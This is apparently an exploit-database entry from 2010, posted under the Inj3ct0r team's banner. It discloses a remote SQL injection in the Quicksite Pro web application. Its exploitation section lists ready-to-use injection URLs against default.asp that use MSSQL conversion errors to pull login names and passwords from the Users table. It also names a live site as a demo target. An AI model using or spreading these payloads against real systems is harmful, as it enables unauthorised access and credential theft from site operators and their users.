Quicksite Pro suffers from a remote SQL injection vulnerability.
64b51fe94c8e0e045838224587d681618f41b6b127f5a7e00427a2278603f1e7
===============================================
Quicksite Pro - Remote SQL Injection Vulnerability
===============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm KnocKout member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : Inj3ct0r Team & DaiMon & BARCOD3
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Quicksite Pro
~Software: http://www.dmd.co.nz/quicksite-pro.asp
~Vulnerability Style : SQL Injection (MSSQL 2000 with error used.)
[~]Date : "11.10.2010"
-----------
~Demo: http://www.hellamarine.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation~~~~~~~~~~~
http://VICTIM/default.asp?t=3 [SQL Injection]
http://VICTIM/default.asp?t=3 anD 1=convert(int,(select top 1 LoginName from Users))--
http://VICTIM/default.asp?t=3 anD 1=convert(int,(select top 1 LoginPassword from Users))--
================================
GoodLuck.